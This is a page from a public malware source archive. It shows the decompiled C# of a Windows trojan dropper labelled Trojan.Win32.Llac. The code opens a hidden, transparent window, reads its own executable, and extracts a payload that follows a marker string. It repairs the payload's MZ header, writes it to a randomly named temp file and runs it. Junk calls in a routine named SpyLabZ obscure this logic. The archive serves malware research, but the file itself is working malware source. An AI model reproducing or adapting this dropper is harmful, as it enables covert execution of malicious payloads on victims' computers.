ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.ypz-45084cf481824ed81a11380e6c3d84287ef148796d8299306e161ad81504fc74/Form1.cs

345 lines
8.7 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Zzz.Form1
// Assembly: Zzz, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 86E78790-E618-49B6-A148-3ECDE2D34904
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.ypz-45084cf481824ed81a11380e6c3d84287ef148796d8299306e161ad81504fc74.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
using Zzz.My;
namespace Zzz
{
[DesignerGenerated]
public class Form1 : Form
{
private IContainer components;
private string[] Ad4l3t;
private string B3lk1;
private string D3;
private string D0sy4;
private string O;
private string K4d4r;
private string Ad1l;
private string Deq1ldi2;
private const string Konst = "./FEDERIKO@CW~";
private string K4yıt1sm1;
public Form1()
{
this.Load += new EventHandler(this.Form1_Load);
this.K4yıt1sm1 = MyProject.Computer.FileSystem.SpecialDirectories.Temp + "\\WindowsTaskbarSolutions." + Path.GetRandomFileName().Replace(".", "") + ".$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$";
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.BackColor = Color.Black;
this.ClientSize = new Size(284, 262);
this.FormBorderStyle = FormBorderStyle.None;
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.RightToLeft = RightToLeft.Yes;
this.RightToLeftLayout = true;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.TransparencyKey = Color.Black;
this.WindowState = FormWindowState.Minimized;
this.ResumeLayout(false);
}
public void SpyLabZ()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_1:
int num3 = 2;
MyProject.Computer.Network.Ping("Patladı_Gitti_:_)");
label_2:
num3 = 3;
Process[] processes = Process.GetProcesses();
int index = 0;
goto label_8;
label_4:
num3 = 4;
Process process;
if (Operators.CompareString(process.ProcessName, "Spy LabZ | Private Mail Hacking ToolZ ! :J", false) != 0)
goto label_6;
label_5:
num3 = 5;
MyProject.Computer.Registry.GetValue("An4htar", "Deqer", (object) "Def4ult");
label_6:
checked { ++index; }
label_7:
num3 = 7;
label_8:
if (index < processes.Length)
{
process = processes[index];
goto label_4;
}
label_9:
num3 = 8;
int baudRate = 1;
label_10:
num3 = 9;
if (MyProject.Computer.Screen.WorkingArea.Height != 1)
goto label_12;
label_11:
num3 = 10;
MyProject.Computer.Ports.OpenSerialPort("P0rt", baudRate);
label_12:
num3 = 12;
checked { ++baudRate; }
if (baudRate <= 10)
goto label_10;
else
goto label_19;
label_14:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_6;
case 7:
goto label_7;
case 8:
goto label_9;
case 9:
goto label_10;
case 10:
goto label_11;
case 11:
case 12:
goto label_12;
case 13:
goto label_19;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_14;
}
throw ProjectData.CreateProjectError(-2146828237);
label_19:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
private void Form1_Load(object sender, EventArgs e)
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_1:
int num3 = 2;
this.SpyLabZ();
label_2:
num3 = 3;
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read);
label_3:
num3 = 4;
this.SpyLabZ();
label_4:
num3 = 5;
this.D0sy4 = Strings.Space(checked ((int) FileSystem.LOF(1)));
label_5:
num3 = 6;
this.SpyLabZ();
label_6:
num3 = 7;
FileSystem.FileGet(1, ref this.D0sy4);
label_7:
num3 = 8;
this.SpyLabZ();
label_8:
num3 = 9;
FileSystem.FileClose(1);
label_9:
num3 = 10;
this.SpyLabZ();
label_10:
num3 = 11;
this.D0sy4 = this.D0sy4.Substring(this.D0sy4.LastIndexOf("./FEDERIKO@CW~")).Replace("./FEDERIKO@CW~", "");
label_11:
num3 = 12;
this.SpyLabZ();
label_12:
num3 = 13;
this.D0sy4 = this.D0sy4.Replace("é<!F£D£R1K0!>é(MZ)", "MZ");
label_13:
num3 = 14;
this.SpyLabZ();
label_14:
num3 = 15;
this.D0sy4 = this.D0sy4.Replace("\0", "Chr(0)");
label_15:
num3 = 16;
this.D0sy4 = this.D0sy4.Replace(Strings.Chr((int) byte.MaxValue), char.MinValue);
label_16:
num3 = 17;
this.D0sy4 = this.D0sy4.Replace("Chr(0)", Conversions.ToString(Strings.Chr((int) byte.MaxValue)));
label_17:
num3 = 18;
this.SpyLabZ();
label_18:
num3 = 19;
FileSystem.FileOpen(2, this.K4yıt1sm1, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Shared);
label_19:
num3 = 20;
this.SpyLabZ();
label_20:
num3 = 21;
FileSystem.FilePut(2, this.D0sy4, -1L, false);
label_21:
num3 = 22;
this.SpyLabZ();
label_22:
num3 = 23;
FileSystem.FileClose(2);
label_23:
num3 = 24;
this.SpyLabZ();
label_24:
num3 = 25;
Interaction.Shell(this.K4yıt1sm1, AppWinStyle.NormalFocus);
ProjectData.EndApp();
label_25:
num3 = 27;
this.Close();
goto label_32;
label_27:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
goto label_6;
case 8:
goto label_7;
case 9:
goto label_8;
case 10:
goto label_9;
case 11:
goto label_10;
case 12:
goto label_11;
case 13:
goto label_12;
case 14:
goto label_13;
case 15:
goto label_14;
case 16:
goto label_15;
case 17:
goto label_16;
case 18:
goto label_17;
case 19:
goto label_18;
case 20:
goto label_19;
case 21:
goto label_20;
case 22:
goto label_21;
case 23:
goto label_22;
case 24:
goto label_23;
case 25:
goto label_24;
case 26:
case 27:
goto label_25;
case 28:
goto label_32;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_27;
}
throw ProjectData.CreateProjectError(-2146828237);
label_32:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
}
}
Reference in New Issue Copy Permalink